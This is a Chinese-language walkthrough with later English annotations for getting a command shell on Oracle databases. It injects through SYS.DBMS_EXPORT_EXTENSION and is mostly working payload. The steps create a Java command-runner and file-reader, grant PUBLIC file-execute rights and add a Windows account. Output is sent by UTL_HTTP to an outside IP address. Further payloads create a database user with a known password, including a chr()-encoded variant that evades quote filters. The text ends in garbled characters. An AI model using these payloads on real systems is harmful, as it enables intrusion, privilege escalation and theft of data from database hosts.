
实例演示oracle注入获取cmdshell的全过程

以下的演示都是在 web 上的 SQL*Plus 中执行的。在 web 注入时,把 select SYS.DBMS_EXPORT_EXTENSION..... 改成

  /xxx.jsp?id=1 and '1'<>'a'||(select SYS.DBMS_EXPORT_EXTENSION.....)

的形式即可。(用 'a'|| 是为了让条件恒为 true:函数返回值前面拼上 'a' 之后不可能等于 '1',页面照常返回,注入的语句则作为副作用被执行,页面上看不到它的输出。)
整个过程依赖目标库的 SYS.DBMS_EXPORT_EXTENSION 未打补丁:注入进去的 PL/SQL 以 SYS 身份执行,后面创建的函数都落在 SYS 模式下(调用时写作 sys.LinxRunCMD);已修补的实例上这些语句不会生效。
语句有点长,可能要用 POST 提交。
以下是各个步骤:
1.创建包
通过注入 SYS.DBMS_EXPORT_EXTENSION 函数,在 Oracle 上创建 Java 类 LinxUtil,里面两个方法:runCMD 用 Runtime.exec() 执行系统命令并返回其标准输出(只读 stdout、不读 stderr;出异常时返回的是异常文本),readFile 用于读取文件:
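-- Step 1: inject through SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES to create and
-- compile the Java source "LinxUtil" (methods runCMD and readFile) in the SYS schema.
-- Quote nesting: inside the outer SQL literal every '' is one quote, so '''' opens and closes
-- the string handed to the inner EXECUTE IMMEDIATE. The Java code itself contains no single quotes.
-- runCMD reads only the command's stdout (stderr is never read) and returns e.toString() on
-- error; readFile returns the whole file, lines joined with "\n".
-- '1'<>'a'||(...) is always true, so the page renders normally and the DDL runs as a side effect;
-- nothing is displayed. Newlines inside the Java source are legal, but the payload is long: POST it.
/xxx.jsp?id=1 and '1'<>'a'||(
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
create or replace and compile java source named "LinxUtil" as import java.io.*; public class LinxUtil extends Object {public static String runCMD(String args) {try{BufferedReader myReader= new BufferedReader(
new InputStreamReader( Runtime.getRuntime().exec(args).getInputStream() ) ); String stemp,str="";while ((stemp = myReader.readLine()) != null) str +=stemp+"\n";myReader.close();return str;} catch (Exception e){return e.toString();}}public static String readFile(String filename){try{BufferedReader myReader= new BufferedReader(new FileReader(filename)); String stemp,str="";while ((stemp = myReader.readLine()) != null) str +=stemp+"\n";myReader.close();return str;} catch (Exception e){return e.toString();}}
}'''';END;'';END;--','SYS',0,'1',0) from dual
)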
------------------------
如果 URL 有长度限制,可以把 readFile() 方法去掉,即:
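-- Shorter variant of step 1 for length-limited injection points: same Java class with only
-- runCMD (stdout of the executed command, e.toString() on error). Quote nesting is unchanged:
-- '''' delimits the string passed to the inner EXECUTE IMMEDIATE. Condition stays always-true.
/xxx.jsp?id=1 and '1'<>'a'||(
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
create or replace and compile java source named "LinxUtil" as import java.io.*; public class LinxUtil extends Object {public static String runCMD(String args) {try{BufferedReader myReader= new BufferedReader(
new InputStreamReader( Runtime.getRuntime().exec(args).getInputStream() ) ); String stemp,str="";while ((stemp = myReader.readLine()) != null) str +=stemp+"\n";myReader.close();return str;} catch (Exception e){return e.toString();}}
}'''';END;'';END;--','SYS',0,'1',0) from dual
)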
同时把后面步骤中针对 readFile()/LinxReadFile 的语句(创建函数、授权、删除)一并去掉。
------------------------------
2.赋 Java 权限(注意:下面把 <<ALL FILES>> 的 execute 权限授给了 PUBLIC,即库里所有用户的 Java 代码都能启动进程,而且会一直保留到被撤销)
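-- Step 2: allow Java stored code to execute files.
-- NOTE(security): grantee is PUBLIC and the target is <<ALL FILES>>, so after this any database
-- user's Java code may spawn processes; the grant persists until revoked (see step 7).
-- Three quoting levels here: a quote around each argument becomes '''''''' (8 quotes).
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''begin dbms_java.grant_permission( ''''''''PUBLIC'''''''', ''''''''SYS:java.io.FilePermission'''''''', ''''''''<<ALL FILES>>'''''''', ''''''''execute'''''''' );end;'''';END;'';END;--','SYS',0,'1',0) from dual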
3.创建函数
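-- Step 3: expose the Java methods as PL/SQL functions (call specs), one statement per
-- GET_DOMAIN_INDEX_TABLES call.
-- No AUTHID clause, so both are definer-rights functions owned by SYS: whoever may call
-- sys.LinxRunCMD runs OS commands under the account the database server runs as.
-- (Contrast Linx_query further below, which is AUTHID CURRENT_USER.)
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
create or replace function LinxRunCMD(p_cmd in varchar2) return varchar2 as language java name ''''''''LinxUtil.runCMD(java.lang.String) return String''''''''; '''';END;'';END;--','SYS',0,'1',0) from dual
-- Drop this second statement when the readFile() method was left out of step 1.
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
create or replace function LinxReadFile(filename in varchar2) return varchar2 as language java name ''''''''LinxUtil.readFile(java.lang.String) return String''''''''; '''';END;'';END;--','SYS',0,'1',0) from dual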
4.赋 PUBLIC 执行函数的权限(之后任何能连上这个库的帐号都能以 SYS 的定义者权限执行系统命令)
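-- Step 4: let every database user call the two functions. GRANT ALL on a function includes
-- EXECUTE. Dropping the functions in step 7 removes these grants with them.
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''grant all on LinxRunCMD to public'''';END;'';END;--','SYS',0,'1',0) from dual
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''grant all on LinxReadFile to public'''';END;'';END;--','SYS',0,'1',0) from dual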
5.测试上面的几步是否成功(原文第一条用的 '1'<>'11'||(...) 写法不管对象存不存在都为真,起不到检测作用,下面改成用 count(*) 判断)
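-- Step 5: verify that the functions were created.
-- Fix vs. the original: '1'<>'11'||(subquery) is true even when the object is missing, because
-- the scalar subquery then yields NULL, '11'||NULL is '11' and '1'<>'11' holds. A count cannot
-- mislead: 0 rows -> 0<0 is false, one or more rows -> true. It also avoids the single-row
-- subquery error if more than one object carries the name.
-- Unquoted object names are stored upper-cased, hence 'LINXRUNCMD' / 'LINXREADFILE'.
and 0<(
select count(*) from all_objects where object_name ='LINXRUNCMD'
)
and 0<(
select count(*) from all_objects where object_name ='LINXREADFILE'
)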
6.执行命令:
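-- Step 6: call the functions blind. '1'<>(output) is true unless the output is empty (NULL in
-- Oracle) or exactly '1', so success is only inferred from the page rendering normally.
-- "cmd /c" is required because Runtime.exec does not go through a shell.
-- The example command creates a persistent local Windows account "linx" on the DB host
-- (noisy, and it has to be removed afterwards).
/xxx.jsp?id=1 and '1'<>(
select sys.LinxRunCMD('cmd /c net user linx /add') from dual
)
-- Read a file from the DB host (Windows path in the example).
/xxx.jsp?id=1 and '1'<>(
select sys.LinxReadFile('c:/boot.ini') from dual
)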
注意 sys.LinxReadFile() 返回的是 varchar 类型,不能用 "and 1<>" 代替 "and '1'<>"(前者会把文件内容隐式转成数字,通常会报错)。另外 '1'<>(...) 这种写法是盲注:命令输出为空(NULL)或恰好等于 '1' 时条件不成立,页面上也看不到输出。
如果要查看运行结果可以用 union(列数和类型要与原查询一致):
-- Show the command output in the page itself. The UNION must match the original query's
-- column count and types, otherwise the statement fails.
/xxx.jsp?id=1 UNION SELECT sys.LinxRunCMD('cmd /c net user linx /add') FROM dual
或者用 UTL_HTTP.request() 把结果带外发出去(下面 URL 里的主机是原文的示例接收地址,使用时必须换成自己控制的主机,否则命令输出和文件内容会发给第三方;另外数据库主机要能向外发 HTTP 请求):
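-- Out-of-band exfiltration: the command output is appended to a URL and fetched with
-- UTL_HTTP.request from the database host, so the host needs outbound HTTP to the collector.
-- Fix vs. the original: Oracle string literals are not escape-processed, so '\n' is the two
-- characters backslash+n and the REPLACE never matched the newlines runCMD/readFile insert;
-- chr(10) is the real newline. Only spaces and newlines are handled here; other URL-special
-- characters (%, &, +, #) still break the request, which is why the text suggests base64.
-- NOTE(security): 211.71.147.3 is the host from the original post. Point this at a host you
-- control, or the output / file contents are shipped to a third party.
/xxx.jsp?id=1 and '1'<>(
SELECT UTL_HTTP.request('http://211.71.147.3/record.php?a=LinxRunCMD:'||REPLACE(REPLACE(sys.LinxRunCMD('cmd /c net user aaa /del'),' ','%20'),chr(10),'%0A')) FROM dual
)
/xxx.jsp?id=1 and '1'<>(
SELECT UTL_HTTP.request('http://211.71.147.3/record.php?a=LinxRunCMD:'||REPLACE(REPLACE(sys.LinxReadFile('c:/boot.ini'),' ','%20'),chr(10),'%0A')) FROM dual
)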
注意:用 UTL_HTTP.request 时,要用 REPLACE() 把空格、换行符替换掉,否则无法提交 http request。Oracle 的字符串字面量不处理转义,'\n' 只是反斜杠加 n 两个字符,换行要写成 chr(10);%、&、+、# 等 URL 特殊字符同样需要处理。也可以先用 utl_encode.base64_encode 编码再发。
--------------------
6.内部变化
通过以下查询可以查看 all_objects 中的变化(函数名是不带引号创建的,存成大写;Java 源是用带引号的 "LinxUtil" 创建的,保留了大小写,所以两个 LIKE 模式都要):
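-- Internal view of what the previous steps created. Unquoted names were folded to upper case
-- (LINXRUNCMD, LINXREADFILE); the Java source was created as the quoted identifier "LinxUtil"
-- and kept its case, so both patterns are needed.
select * from all_objects where object_name like '%LINX%' or object_name like '%Linx%'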
7.删除我们创建的对象(原文只删了 LinxRunCMD;LinxReadFile、Java 源 LinxUtil 以及第 2 步授给 PUBLIC 的文件权限也要一并清理,否则会留在目标库里)
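-- Step 7: remove everything the earlier steps created. The original dropped only LinxRunCMD;
-- LinxReadFile, the Java source and the PUBLIC file permission from step 2 would otherwise stay
-- behind. One statement per GET_DOMAIN_INDEX_TABLES call, as before. Dropping a function also
-- drops the grants made on it in step 4.
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
drop function LinxRunCMD '''';END;'';END;--','SYS',0,'1',0) from dual
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
drop function LinxReadFile '''';END;'';END;--','SYS',0,'1',0) from dual
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
drop java source "LinxUtil" '''';END;'';END;--','SYS',0,'1',0) from dual
-- Undo the step-2 grant; dbms_java.revoke_permission takes the same arguments as grant_permission.
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''begin dbms_java.revoke_permission( ''''''''PUBLIC'''''''', ''''''''SYS:java.io.FilePermission'''''''', ''''''''<<ALL FILES>>'''''''', ''''''''execute'''''''' );end;'''';END;'';END;--','SYS',0,'1',0) from dual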
====================================================
全文结束。谨以此文赠与我的朋友。
linx
124829445
2008.1.12
linyujian@bjfu.edu.cn
======================================================================
测试漏洞的另一方法:
创建 Oracle 帐号(这会在目标库里留下一个口令为 linxsql 的用户,测完务必删除):
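-- Alternative vulnerability check: create a database account through the same injection.
-- This leaves a user with a known password on the target; drop it afterwards (see below).
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
CREATE USER linxsql IDENTIFIED BY linxsql'''';END;'';END;--','SYS',0,'1',0) from dual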
即(把所有字符串用 chr() 拼出来,payload 里就不再出现单引号,适用于应用对单引号做转义或过滤的情况;注意这里 PUT 用的是绑定占位符 :P1 而不是上面的字面量 1):
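-- Same CREATE USER statement with every string built from chr(): no single quote appears in the
-- payload, which matters when the application escapes or strips quotes. Decoded, the arguments are
--   'FOO', 'BAR',
--   DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE 'DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''CREATE USER linxsql IDENTIFIED BY linxsql'';END;';END;--
--   'SYS', 0, '1', 0
-- (third argument shown as the raw string value; note PUT(:P1) instead of PUT(1)).
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES(chr(70)||chr(79)||chr(79),chr(66)||chr(65)||chr(82),
chr(68)||chr(66)||chr(77)||chr(83)||chr(95)||chr(79)||chr(85)||chr(84)||chr(80)||chr(85)||chr(84)||chr(34)||chr(46)||chr(80)||chr(85)||chr(84)||chr(40)||chr(58)||chr(80)||chr(49)||chr(41)||chr(59)||chr(69)||chr(88)||chr(69)||chr(67)||chr(85)||chr(84)||chr(69)||chr(32)||chr(73)||chr(77)||chr(77)||chr(69)||chr(68)||chr(73)||chr(65)||chr(84)||chr(69)||chr(32)||chr(39)||chr(68)||chr(69)||chr(67)||chr(76)||chr(65)||chr(82)||chr(69)||chr(32)||chr(80)||chr(82)||chr(65)||chr(71)||chr(77)||chr(65)||chr(32)||chr(65)||chr(85)||chr(84)||chr(79)||chr(78)||chr(79)||chr(77)||chr(79)||chr(85)||chr(83)||chr(95)||chr(84)||chr(82)||chr(65)||chr(78)||chr(83)||chr(65)||chr(67)||chr(84)||chr(73)||chr(79)||chr(78)||chr(59)||chr(66)||chr(69)||chr(71)||chr(73)||chr(78)||chr(32)||chr(69)||chr(88)||chr(69)||chr(67)||chr(85)||chr(84)||chr(69)||chr(32)||chr(73)||chr(77)||chr(77)||chr(69)||chr(68)||chr(73)||chr(65)||chr(84)||chr(69)||chr(32)||chr(39)||chr(39)||chr(67)||chr(82)||chr(69)||chr(65)||chr(84)||chr(69)||chr(32)||chr(85)||chr(83)||chr(69)||chr(82)||chr(32)||chr(108)||chr(105)||chr(110)||chr(120)||chr(115)||chr(113)||chr(108)||chr(32)||chr(73)||chr(68)||chr(69)||chr(78)||chr(84)||chr(73)||chr(70)||chr(73)||chr(69)||chr(68)||chr(32)||chr(66)||chr(89)||chr(32)||chr(108)||chr(105)||chr(110)||chr(120)||chr(115)||chr(113)||chr(108)||chr(39)||chr(39)||chr(59)||chr(69)||chr(78)||chr(68)||chr(59)||chr(39)||chr(59)||chr(69)||chr(78)||chr(68)||chr(59)||chr(45)||chr(45),chr(83)||chr(89)||chr(83),0,chr(49),0) from dual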
确定漏洞存在(用户已创建时子查询返回 user_id,条件为真;不存在时子查询为 NULL,条件不成立):
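-- Confirm the account exists. all_users.user_id is numeric, so 1<>(...) is fine here; when the
-- user is missing the scalar subquery yields NULL and the condition is not true.
-- The name is compared upper-cased because CREATE USER linxsql stored it that way.
1<>(
select user_id from all_users where username='LINXSQL'
)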
给 linxsql 授 CONNECT 角色(之后就可以用 linxsql/linxsql 直接登录数据库):
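-- Give the test account the CONNECT role so it can log in directly.
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
GRANT CONNECT TO linxsql'''';END;'';END;--','SYS',0,'1',0) from dual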
删除帐号:
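-- Remove the test account again. This variant uses the bind placeholder :P1 in DBMS_OUTPUT.PUT
-- instead of the literal 1 used in the earlier payloads; both forms appear in the original post.
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
drop user LINXSQL'''';END;'';END;--','SYS',0,'1',0) from dual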
======================
以下方法创建一个可以执行任意单条语句(或匿名块)的函数 Linx_query(),执行成功返回数值 1。它声明了 AUTHID CURRENT_USER,执行时用的是调用者的权限(前面的 LinxRunCMD/LinxReadFile 没有声明 AUTHID,是定义者权限,以 SYS 身份运行),而调用者往往只有 PUBLIC 级别的权限,所以作用似乎不大;真要用的话可以先用上面的注入方式 grant dba 给当前用户:
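-- Create an invoker-rights function that runs whatever single statement (or anonymous block)
-- is passed in and returns 1. Because of AUTHID CURRENT_USER it executes with the caller's
-- privileges, unlike the definer-rights functions from step 3, so it gains nothing beyond what
-- the injected session already has. As in step 1, use '1'<>'a'||(...) if the plain form does not
-- keep the condition true. The original post repeats a truncated copy of this statement right
-- after it; that fragment is omitted here.
1.jsp?id=1 and '1'<>(
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
create or replace function Linx_query (p varchar2) return number authid current_user is begin execute immediate p; return 1; end; '''';END;'';END;--','SYS',0,'1',0) from dual
)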
. Q% N) l5 c! a! I& {2 \
' k' i& F, J* I& u; k9 B9 y, h+ W3 |0 v1 k$ s/ Z' `2 a5 }2 I7 W% ?
  R) G  E- D1 O% x, X